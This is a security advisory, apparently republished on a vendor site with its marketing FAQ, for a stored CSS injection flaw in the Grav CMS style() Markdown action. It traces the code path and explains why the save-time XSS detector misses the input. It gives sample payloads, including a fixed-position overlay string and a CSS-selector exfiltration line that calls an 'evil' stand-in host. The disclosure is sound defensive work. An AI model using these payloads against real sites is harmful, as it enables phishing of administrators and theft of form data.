CVE-2026-55890 is a medium-severity cross-site scripting (XSS) vulnerability in getgrav/grav (composer), affecting versions <= 2.0.0-rc.8. It is fixed in 2.0.0-rc.9.
Summary The fix for GHSA-r7fx-8g49-7hhr / CVE-2026-42841 (Stored XSS via Markdown media attribute() action) is incomplete. The maintainer patched MediaObjectTrait::attribute() to deny dangerous attribute names (event handlers, style, xmlns, srcdoc, formaction) but the sibling MediaObjectTrait::style() method is reachable through the same Markdown excerpt-action pipeline and writes editor-controlled strings straight into the rendered <img style="…"> attribute with no sanitization. Any user with admin.pages permission (e.g. an editor) can save Markdown like: which renders to a stored-CSS payload that any higher-privileged viewer (administrator, super-admin, reviewer) loads in their authenticated session. Same trust boundary, same victim, same attacker, same Markdown input vector as the patched GHSA-r7fx-8g49-7hhr issue, the fix simply patched the attribute() entry point and missed the style() sibling. Affected versions Vulnerable at HEAD across every currently-shipping branch (verified 2026-06-15): | Branch / tag | MediaObjectTrait::style() | |---|---| | develop (f4c0f42) | unpatched | | 2.0 (96e1d2d) | unpatched | | 2.0.0-rc.8 (latest 2.0 RC tag) | unpatched | | 1.7.52 (latest 1.7 stable) | unpatched | Per SECURITY.md, this advisory targets the 2.0 line (publisher-level exploit, not eligible for 1.7 backport per the project's stated policy). Trust boundary Per the project's SECURITY.md: A vulnerability is when an actor can escape the trust scope of their role: a publisher whose stored content compromises an admin session, an unauthenticated visitor who reaches a privileged sink, an account at any tier that gains capabilities it was not granted. An editor authoring Markdown is operating within their role. A higher-privilege admin loading that editor's page in their authenticated session and getting attacker-controlled CSS painted into their browser is across the trust boundary, the same framing that was accepted for GHSA-r7fx-8g49-7hhr (MODERATE) and GHSA-c2q3-p4jr-c55f (MODERATE). Details Original GHSA-r7fx-8g49-7hhr fix (commit 5a12f9be8, 2026-04-23) style is the second-named entry on the denylist, the maintainer explicitly recognised that editor-supplied style was dangerous when arriving via the attribute() action. The fix simply didn't reach the parallel sink. The unpatched sibling: MediaObjectTrait::style() (line 519) The function is unchanged before, during, and after the GHSA-r7fx-8g49-7hhr fix. The PHPDoc on the very next line names the Markdown invocation form (?style=…). The rtrim is for clean concatenation, not security. $styleAttributes is concatenated and assigned to attributes['style'] in parsedownElement() (lines 242–251): Parsedown then runs htmlspecialchars on the value (so quote-breakout into a new attribute is blocked), but arbitrary CSS as the value is enough. Source → sink trace The Markdown processor wires query-string keys to method calls on the Medium object (system/src/Grav/Common/Page/Markdown/Excerpts.php:262): ?style=position:fixed;top:0;left:0 becomes $medium->style('position:fixed;top:0;left:0'). Save-side XSS detector misses the payload AdminController::savePage() runs Security::detectXssFromArray() on data[content] before persisting (classes/plugin/AdminController.php:1402). All five default patterns miss the Markdown form: onevents: requires <…on*= in source. invalidprotocols: requires javascript:/data:/etc., the phishing-overlay payload uses none. mozbinding: requires -moz-binding: literally. htmlinlinestyles: requires <…style=…(url:|x:expression); Markdown source has no < and no url:. dangeroustags: requires <svg/<script/etc. Save proceeds, the payload persists, the CSS is rendered to every viewer. Impact Phishing overlay, full-viewport position:fixed covering the admin UI with attacker-controlled background/content; admin clicks intended actions into the attacker's overlay. UI redress / clickjacking, invisible overlays hijacking admin button clicks. CSS-selector data exfiltration, input[value^="a"] { background: url(//evil/log?c=a) } against form fields the higher-privileged viewer interacts with. Persistent admin-UI denial-of-service, position:fixed; background:white covers the page until the offending content is removed by hand on the server. The stored payload reaches every user who views the editor's page, including administrators previewing pending changes. Proof of concept A deterministic end-to-end PoC against a real Grav install ships with the finding (repro.sh). Steps: Log in as an editor (admin.pages + admin.pages.update, no admin.super). Upload a benign image to a target page. Save the page with the Markdown payload . Visit the public page; observe the <img style="…"> carrying the unsanitised CSS. Suggested fix Apply the same denylist + identifier-shape gate to style() that isSafeAttributeName() enforces for attribute(): Alternatively, deprecate the Markdown ?style=… action entirely, themes can still set inline styles from PHP, but accepting attacker-controlled CSS from page content was always a footgun. Defense in depth: extend Security::detectXss()'s htmlinlinestyles rule to also match Markdown-form ?style= query parameters in data[content] on save. References Original advisory: GHSA-r7fx-8g49-7hhr Fix commit: 5a12f9be8 (system/src/Grav/Common/Media/Traits/MediaObjectTrait.php) Unpatched code: system/src/Grav/Common/Media/Traits/MediaObjectTrait.php lines 519–524 Project security policy: SECURITY.md (trust-boundary severity model)
Untrusted input is rendered as active markup in a victim's browser, which can run script in their session. Typical impact: session or credential theft, and actions taken as the user.
CVE-2026-55890 has a CVSS score of 4.8 (Medium). The vector is network-reachable, high privileges required, and user interaction required. A CVSS score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether this affects your application depends on whether the vulnerable code is present and reachable in your environment.
A fixed version is available (2.0.0-rc.9). Upgrading removes the vulnerable code path.
composer
getgrav/grav (<= 2.0.0-rc.8)getgrav/grav → 2.0.0-rc.9 (composer)Severity tells you how bad this could be in the worst case. It does not tell you whether you are exposed. Exploitability and impact are functions of runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A vulnerable package can sit in your dependency tree and never run.
Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter instead of chasing every advisory.
Kodem's runtime-powered SCA identifies whether CVE-2026-55890 is reachable in your applications. Explore open-source security for your team.
See if CVE-2026-55890 is reachable in your applications. Get a demo
Upgrade getgrav/grav to 2.0.0-rc.9 or later to resolve this vulnerability.
Kodem Kai can prioritize this vulnerability in your dependency tree and generate a fix recommendation.
CVE-2026-55890 is a medium-severity cross-site scripting (XSS) vulnerability in getgrav/grav (composer), affecting versions <= 2.0.0-rc.8. It is fixed in 2.0.0-rc.9. Untrusted input is rendered as active markup in a victim's browser, which can run script in their session.
CVE-2026-55890 has a CVSS score of 4.8 (Medium). This score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether it represents real risk in your environment depends on whether the vulnerable code is present and reachable.
getgrav/grav (composer) versions <= 2.0.0-rc.8 is affected.
Yes. CVE-2026-55890 is fixed in 2.0.0-rc.9. Upgrade to this version or later.
Whether CVE-2026-55890 is exploitable in your environment depends on whether the vulnerable code is present and reachable. A CVSS score is a worst-case rating; it does not account for your specific deployment, configuration, or usage patterns. Kodem, an Intelligent Application Security platform, uses runtime intelligence to show which vulnerabilities actually execute in production, so you can focus on the ones that represent real risk. Get a demo
Exploitability and impact are not fixed properties of a CVE. They depend on runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A high CVSS score on a dependency that never runs is not the same as real risk. Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter.
Upgrade getgrav/grav to 2.0.0-rc.9 or later.